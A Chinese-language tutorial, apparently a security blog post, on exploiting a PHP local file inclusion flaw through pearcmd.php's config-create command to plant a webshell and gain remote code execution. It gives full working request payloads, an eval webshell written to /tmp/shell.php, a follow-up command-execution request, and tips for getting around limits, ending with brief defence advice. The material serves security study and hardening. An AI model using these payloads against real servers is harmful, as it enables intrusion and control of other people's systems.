本文介绍了如何利用 PHP 的 PEAR 扩展管理工具在存在 LFI 漏洞的情况下进行攻击。通过构造特殊的 URL Payload,攻击者可以利用 pearcmd.php 脚本来创建包含恶意 PHP 代码的文件,实现远程代码执行(RCE)。文章详细阐述了核心原理、前置条件、攻击流程、潜在限制以及防御建议,强调了在生产环境中应关闭 register_argc_argv 设置,并卸载 PEAR,以增强安全性。

在php7.3及以前,pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装

1. 核心原理 (The Core Concept)

利用场景:当你拥有一个 LFI 漏洞,但无法上传文件,且目标服务器(通常是 Docker 容器)安装了 PHP 的 PEAR 扩展管理工具。 攻击逻辑

  1. LFI 包含:通过漏洞包含服务器上的 pearcmd.php 脚本。
  2. CLI 欺骗:利用 PHP 的 register_argc_argv 特性,通过 HTTP URL 的查询字符串(Query String)向 pearcmd.php 传递命令行参数
  3. 文件写入:调用 PEAR 的 config-create 指令,将恶意 PHP 代码作为“配置参数”写入到服务器的可写目录(如 /tmp),生成 Webshell。

2. 前置条件 (Prerequisites)

攻击成功的“三要素”:

  1. LFI 漏洞存在:能够包含任意路径的文件。
  2. register_argc_argv = On
  3. pearcmd.php 存在

3. 攻击流程与 Payload 详解

第一步:构造恶意 Payload

我们需要构造一个 URL,既能触发 LFI,又能传递参数给 pearcmd

标准 Payload 模板

GET /vulnerable.php?file=../../usr/local/lib/php/pearcmd.php&%2bconfig-create%2b/&/<?php+@eval($_GET['cmd']);?>%2b/tmp/shell.php HTTP/1.1

Payload 逐段解析

URL片段作用解析
file=...pearcmd.php触发 LFI:Web 应用加载并运行 pearcmd 脚本。
&分隔符:区分 LFI 参数和命令行注入参数(视情况而定)。
%2b (即 +)空格替代:在 argv 解析中,+ 被转换为空格,用于分隔命令行参数。
config-create参数 1 (Command):告诉 PEAR 执行“创建默认配置文件”的命令。
/&/<?php...?>参数 2 (Value):通常是配置文件的根路径。我们注入 PHP 代码。PEAR 会把这个字符串原样写入文件。
/tmp/shell.php参数 3 (File Path):指定配置文件的保存路径(必须可写)。

第二步:服务器内部执行逻辑

当请求发送后,服务器内部发生了什么?

解析 URL:PHP 引擎看到 register_argc_argv=On,将 Query String 解析为数组:

$_SERVER['argv'] = [
    0 => 'pearcmd.php',    // 脚本名
    1 => 'config-create',  // 命令
    2 => '/&/<?php @eval($_GET[cmd]);?>', // 内容
    3 => '/tmp/shell.php'  // 目标文件
];

加载脚本:LFI 漏洞包含并运行 pearcmd.php

执行命令pearcmd.php 读取 $_SERVER['argv'],认为自己在命令行下运行。

写入文件:执行 config-create,将参数 2 的内容写入参数 3 指定的文件。

第三步:触发 RCE

文件创建成功后,再次利用 LFI 包含这个新生成的文件:

GET /vulnerable.php?file=../../../../tmp/shell.php&cmd=id

结果:执行系统命令 id

4. 关键限制与绕过 (Troubleshooting)

这是最容易踩坑的地方,请重点记录:

  • 限制 1:等号 (=) 的干扰
    • 问题:如果 URL Query String 中包含 =(例如 ?file=...&param=value),PHP 某些版本可能不会生成 $argv,或者 Web 应用可能会处理冲突。
    • 解决
      • 尽量让 payload 位于 Query String 的最前面。
      • 如果 LFI 点必须用 GET 参数(如 ?page=...),这种利用可能会失效。
  • 限制 2:路径猜测
    • 问题:不知道 pearcmd.php 在哪。
    • 解决:利用目录扫描工具或读取 phpinfo()
  • 限制 3:权限问题
    • 问题:Web 用户(www-data)无法写入 /tmp 或被 open_basedir 限制。
    • 解决:尝试写入 /var/tmp/ 或 Web 目录下的 uploads/ 文件夹。

5. 防御建议 (Defense)

  • 关闭开关:在 php.ini 中设置 register_argc_argv = Off(最彻底的修复)。
  • 卸载 PEAR:生产环境容器通常不需要 PEAR,构建镜像时应移除。
  • 输入验证:严格过滤 LFI 参数,禁止 .. 和绝对路径。